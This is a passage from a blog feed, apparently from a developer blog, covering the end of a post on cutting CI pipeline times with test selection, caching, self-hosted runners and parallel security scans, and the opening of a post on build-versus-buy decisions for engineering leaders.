    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;services/api/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tests/api/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;services/auth/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tests/auth/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;services/billing/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tests/billing/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;shared/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tests/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# shared code = run everything
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;tests_to_run&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nb"&gt;file&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;changed&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;test_dir&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;test_map&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;items&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;startswith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;tests_to_run&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;test_dir&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# If nothing matched, run everything (safety net)
&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;tests_to_run&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;tests_to_run&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tests/&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tests_to_run&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Select tests&lt;/span&gt;
  &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tests&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "dirs=$(python .github/scripts/test_selector.py)" &amp;gt;&amp;gt; $GITHUB_OUTPUT&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run tests&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pytest ${{ steps.tests.outputs.dirs }}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; Most PRs touch 1-2 services. Running only relevant tests: 2.5 minutes → 45 seconds. Full suite still runs on merge to main.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Artifact Caching for Lint and Type Checks (Saved: 2 minutes)
&lt;/h3&gt;

&lt;p&gt;ESLint, mypy, and tsc have incremental modes. Use them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Cache mypy&lt;/span&gt;
  &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/cache@v4&lt;/span&gt;
  &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.mypy_cache&lt;/span&gt;
    &lt;span class="na"&gt;key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mypy-${{ hashFiles('**/*.py') }}&lt;/span&gt;
    &lt;span class="na"&gt;restore-keys&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mypy-&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Type check&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mypy --incremental src/&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For ESLint:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Cache ESLint&lt;/span&gt;
  &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/cache@v4&lt;/span&gt;
  &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.eslintcache&lt;/span&gt;
    &lt;span class="na"&gt;key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eslint-${{ hashFiles('**/*.ts', '**/*.tsx') }}&lt;/span&gt;

&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Lint&lt;/span&gt;
  &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;eslint --cache --cache-location .eslintcache src/&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; Incremental lint/type-check: 2 minutes → 15 seconds on most PRs.&lt;/p&gt;

&lt;h3&gt;
  
  
  6. Self-Hosted Runners (Saved: 2 minutes of queue time)
&lt;/h3&gt;

&lt;p&gt;GitHub-hosted runners have 30-90 second startup times plus queue time during peak hours. We run our CI on the same bare metal server as our staging environment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;self-hosted&lt;/span&gt;

&lt;span class="c1"&gt;# In our runner setup (systemd service)&lt;/span&gt;
&lt;span class="c1"&gt;# Runner installed at /opt/actions-runner&lt;/span&gt;
&lt;span class="c1"&gt;# Runs as dedicated ci-runner user with Docker socket access&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Setup (one-time, 15 minutes):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Download GitHub Actions runner binary&lt;/li&gt;
&lt;li&gt;Create systemd service&lt;/li&gt;
&lt;li&gt;Give the runner user Docker socket access&lt;/li&gt;
&lt;li&gt;Configure labels for routing&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Self-hosted runners start instantly — no cloud VM boot, no image pull. Queue time went from 30-90 seconds to 0.&lt;/p&gt;

&lt;p&gt;For teams in India or Southeast Asia, this also eliminates the latency penalty of GitHub's US-based runners pulling from your APAC Docker registry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 2 minutes of queue/startup time eliminated. Free. Forever.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Result
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Queue + startup&lt;/td&gt;
&lt;td&gt;1.5 min&lt;/td&gt;
&lt;td&gt;0 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dependency install&lt;/td&gt;
&lt;td&gt;6 min&lt;/td&gt;
&lt;td&gt;0 min (cached)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lint + type check&lt;/td&gt;
&lt;td&gt;2 min&lt;/td&gt;
&lt;td&gt;0.25 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build&lt;/td&gt;
&lt;td&gt;3 min&lt;/td&gt;
&lt;td&gt;0.5 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tests&lt;/td&gt;
&lt;td&gt;8 min&lt;/td&gt;
&lt;td&gt;2.5 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;20.5 min&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;3.25 min&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;85% reduction. Zero additional cost.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Mistakes That Negate These Gains
&lt;/h2&gt;

&lt;p&gt;We've seen teams implement all six optimizations and still have slow pipelines. Here's why.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 1: Flaky tests that force re-runs.&lt;/strong&gt; If 5% of your test suite is flaky, you'll re-run CI on average once every 3-4 PRs. That re-run costs the full pipeline time. We quarantine flaky tests into a separate non-blocking job: they run, their results are logged, but they don't block the PR. A weekly "flaky test cleanup" ticket keeps the quarantine from growing forever.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 2: Not pinning dependency versions.&lt;/strong&gt; If your &lt;code&gt;requirements.txt&lt;/code&gt; has unpinned ranges (&lt;code&gt;requests&amp;gt;=2.28&lt;/code&gt;), dependency resolution runs on every build that isn't fully layer-cached, because pip must check whether a newer version satisfies the constraint. Pin exact versions (&lt;code&gt;requests==2.31.0&lt;/code&gt;) and let Dependabot or Renovate handle updates. This alone can save 30-60 seconds per build.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 3: Running security scans synchronously.&lt;/strong&gt; SAST/DAST tools (Snyk, Trivy, Bandit) are important but slow. Run them in a parallel job that doesn't block the main build. Your pipeline reports results, but developers can merge without waiting for a 3-minute vulnerability scan. Critical findings trigger a separate alert. This principle extends to secret scanning too — we cover the full secret management pipeline in our &lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;dedicated guide&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 4: Over-building in CI.&lt;/strong&gt; Some teams build Docker images for every microservice on every PR, even when the service code didn't change. Use the same path-based filtering from Step 4 to skip builds for unchanged services. Our &lt;code&gt;docker-compose.ci.yml&lt;/code&gt; has a &lt;code&gt;--profile&lt;/code&gt; flag per service — CI only activates profiles for services with code changes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 5: Ignoring the feedback loop.&lt;/strong&gt; After optimizing, most teams stop measuring. We track CI build times in Prometheus and alert if the p95 build time exceeds 5 minutes. Performance degrades slowly — a new dependency here, an extra test there — and without monitoring, you're back to 15 minutes within 6 months.&lt;/p&gt;
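
&lt;p&gt;The check itself is a one-liner once you have the durations. A minimal sketch of the p95 computation; the sample build times are made up:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import statistics

# p95 of recent CI build durations in minutes; alert when it drifts past 5.
recent_builds = [2.9, 3.1, 3.4, 2.8, 3.0, 3.2, 4.8, 3.1, 3.3, 2.7]

# quantiles(n=20) returns 19 cut points; the last one is the 95th percentile.
p95 = statistics.quantiles(recent_builds, n=20)[-1]
print(f"p95 build time: {p95:.2f} min (alert threshold: 5 min)")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
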

&lt;h2&gt;
  
  
  Security Considerations in Fast Pipelines
&lt;/h2&gt;

&lt;p&gt;Fast pipelines are only valuable if they're secure. Skipping security checks for speed is a false economy.&lt;/p&gt;

&lt;p&gt;Our approach: security scans run in parallel, never blocking the main build path, but their results are mandatory before deploy. The build completes in 3 minutes, the security scan completes in 5, and the deploy job waits for both.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build-and-test&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;  &lt;span class="c1"&gt;# 3 minutes&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;self-hosted&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;...&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

  &lt;span class="na"&gt;security-scan&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;  &lt;span class="c1"&gt;# 5 minutes, runs in parallel&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;self-hosted&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/trivy-action@master&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bandit -r src/ -f json -o bandit-report.json&lt;/span&gt;

  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;  &lt;span class="c1"&gt;# waits for BOTH&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;build-and-test&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;security-scan&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;if&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;github.ref == 'refs/heads/main'&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;...&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means the critical path is still 5 minutes (the slower security scan), but the developer feedback loop (did my tests pass?) is 3 minutes. Developers get fast feedback; deploys get security guarantees.&lt;/p&gt;

&lt;p&gt;For teams handling sensitive credentials in their pipelines, our &lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;secret management best practices&lt;/a&gt; guide covers how to avoid leaking secrets through CI logs, a common issue with fast, parallelized builds.&lt;/p&gt;

&lt;h2&gt;
  
  
  What We'd Add Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bazel or Nx&lt;/strong&gt; for true incremental builds across a monorepo. We're not there yet — our repo isn't big enough to justify the complexity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test impact analysis&lt;/strong&gt; using coverage data to be even more surgical about test selection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Merge queues&lt;/strong&gt; (GitHub's native feature) to batch CI runs and reduce total runner time.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote build caching&lt;/strong&gt; (Turborepo, Gradle remote cache) for teams with larger monorepos — we've seen this shave another 40% off already-optimized builds.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The ROI Math
&lt;/h2&gt;

&lt;p&gt;The ROI on CI optimization is absurd. A 12-person team saving 17 minutes per build across 30 daily builds reclaims 8.5 engineering hours per day. That's a full-time engineer's worth of productivity — recovered by spending 2 days on pipeline optimization.&lt;/p&gt;
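
&lt;p&gt;The arithmetic behind that claim:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Hours reclaimed per day by the pipeline optimization above.
minutes_saved_per_build = 17   # ~17 min saved per build (20.5 before, 3.25 after)
builds_per_day = 30

hours_reclaimed = minutes_saved_per_build * builds_per_day / 60
print(f"{hours_reclaimed} engineering hours reclaimed per day")  # 8.5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
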

&lt;p&gt;But the real ROI isn't time saved; it's behavior change. When CI takes 3 minutes, developers wait for results before context-switching. When it takes 20 minutes, they start another task and the PR review sits for hours. Fast CI changes how your entire team works. The same &lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;build vs buy analysis&lt;/a&gt; applies here: spend the 2 days optimizing the pipeline you already have before evaluating a paid CI platform.&lt;/p&gt;

&lt;h2&gt;
  
  
  Frequently Asked Questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q: Does this work for monorepos?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, with adjustments. Steps 4 (smart test selection) and the Docker profile trick become even more valuable in monorepos because the ratio of "code changed" to "total code" is smaller. For monorepos over 50 services, consider Bazel, Nx, or Turborepo for incremental build tracking — they maintain a dependency graph that makes test selection automatic rather than manual.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: What about Windows or macOS builds?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Self-hosted runners (Step 6) work on all platforms, but the Docker caching strategy (Steps 1 and 3) is Linux-specific. For macOS CI (common in mobile development), focus on dependency caching (CocoaPods, Carthage) and parallel test sharding (XCTest supports this natively). The ROI is even higher for macOS builds because GitHub-hosted macOS runners bill at 10x the per-minute rate of Linux runners.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: We use GitLab CI / Jenkins / CircleCI — does this still apply?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every optimization except the GitHub-specific YAML applies to any CI system. Docker layer caching works everywhere Docker runs. Parallel test sharding works with any test framework. Dependency pre-builds work with any registry. Self-hosted runners exist for GitLab (gitlab-runner), Jenkins (agents), and CircleCI (self-hosted runner). The concepts transfer; only the config syntax changes.&lt;/p&gt;

&lt;h2&gt;
  
  
  Related Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;Self-Hosted LLMs vs API: Cost Comparison&lt;/a&gt; — the self-hosted runner approach from Step 6 applied to AI inference infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;Build vs Buy Framework&lt;/a&gt; — should you build your own CI tooling or buy? (Spoiler: optimize what you have first)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;Secret Management for DevOps&lt;/a&gt; — keeping credentials secure in fast CI/CD pipelines&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;We help teams audit and optimize their CI/CD pipelines. If your builds take longer than 5 minutes, there's almost certainly low-hanging fruit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;Get a free pipeline audit →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Subscribe to our newsletter for weekly deep-dives into developer productivity and infrastructure optimization.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Build vs Buy: The Framework for Engineering Leaders</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 28 Apr 2026 06:00:04 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/build-vs-buy-the-framework-for-engineering-leaders-51j2</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/build-vs-buy-the-framework-for-engineering-leaders-51j2</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Build vs Buy: The Framework for Engineering Leaders
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;How to make the call without analysis paralysis — and the $200K mistakes we've seen.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Wrong Question
&lt;/h2&gt;

&lt;p&gt;"Should we build or buy?" is the wrong question. It assumes two clean options. In reality, the decision space looks more like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Build from scratch&lt;/strong&gt; — full control, full cost&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Buy SaaS&lt;/strong&gt; — zero maintenance, vendor dependency&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Buy + customize&lt;/strong&gt; — partial control, integration tax&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Open-source + host&lt;/strong&gt; — free software, your ops burden&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partner / outsource the build&lt;/strong&gt; — external expertise, internal ownership&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Most teams collapse all of these into "build vs buy" and then spend 6 weeks in analysis paralysis because neither pure option feels right.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 4-Question Framework
&lt;/h2&gt;

&lt;p&gt;After watching dozens of teams agonize over this decision (and making some expensive wrong calls ourselves), we use four questions. Answer them honestly and the decision usually becomes obvious.&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 1: Is This Core to Your Product?
&lt;/h3&gt;

&lt;p&gt;This is the only question that matters more than cost.&lt;/p&gt;

&lt;p&gt;If the capability is what customers pay you for — it's your competitive edge, your differentiation, the reason you exist — you build it. Always. Even if it's expensive. Even if there's a SaaS tool that does 80% of what you need.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Core:&lt;/strong&gt; Stripe built their own payment processing engine. That IS Stripe. Buying a white-label payment processor would have been absurd.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Not core:&lt;/strong&gt; Stripe uses Slack for internal communication. Building a custom chat tool would have been absurd.&lt;/p&gt;

&lt;p&gt;The trap: everything feels core when you're building it. Teams convince themselves that their CI/CD pipeline is "special" or their internal analytics dashboard needs "custom logic." Test it with this question: &lt;em&gt;Would a customer switch to your competitor if they had a better version of this specific thing?&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;If no, it's not core. Buy it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 2: Does a Mature Market Solution Exist?
&lt;/h3&gt;

&lt;p&gt;"Mature" means: 3+ years in production at companies your size, public pricing, documented migration paths, active community or support team.&lt;/p&gt;

&lt;p&gt;If the market solution is mature:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The buy option is probably better than what you'd build in 6 months&lt;/li&gt;
&lt;li&gt;The total cost is known and predictable&lt;/li&gt;
&lt;li&gt;You can switch vendors if it doesn't work (mature markets have competition)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If the market is immature (fewer than 3 credible options, all pre-Series B, pricing changes quarterly):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The buy option will change under you&lt;/li&gt;
&lt;li&gt;You'll spend as much time working around vendor limitations as you would have spent building&lt;/li&gt;
&lt;li&gt;You might end up rebuilding anyway when the vendor pivots or dies&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Framework:&lt;/strong&gt; Mature market + not core = BUY. Immature market + not core = open-source + host, or wait.&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 3: What's Your True Total Cost of Ownership?
&lt;/h3&gt;

&lt;p&gt;The build side always underestimates. The buy side sometimes does too.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Build costs teams forget:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Ongoing maintenance (20% of build cost per year, minimum)&lt;/li&gt;
&lt;li&gt;On-call burden (someone has to wake up at 3am for your custom system)&lt;/li&gt;
&lt;li&gt;Opportunity cost (those 3 engineers could be building product features)&lt;/li&gt;
&lt;li&gt;Knowledge concentration risk (what happens when the person who built it leaves?)&lt;/li&gt;
&lt;li&gt;Security patching (you own every CVE in your custom code)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Buy costs teams forget:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Integration engineering (connecting SaaS to your systems takes real work)&lt;/li&gt;
&lt;li&gt;Per-seat pricing at scale (that $10/user/month is $120K/year at 1,000 employees)&lt;/li&gt;
&lt;li&gt;Migration cost when you eventually switch (data export, retraining, workflow changes)&lt;/li&gt;
&lt;li&gt;Compliance review (every new vendor is a SOC 2 questionnaire)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We built a spreadsheet model: take the vendor quote, multiply by 1.4x for integration and compliance costs. Take the build estimate, multiply by 2.5x for maintenance and opportunity cost over 3 years. Compare the 3-year totals. This model has been right within 20% for every decision we've tracked.&lt;/p&gt;
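&lt;p&gt;The arithmetic fits in a few lines of Python. This is a minimal sketch of the model, assuming the vendor quote is annual; the example inputs are invented for illustration, not client figures.&lt;/p&gt;

```python
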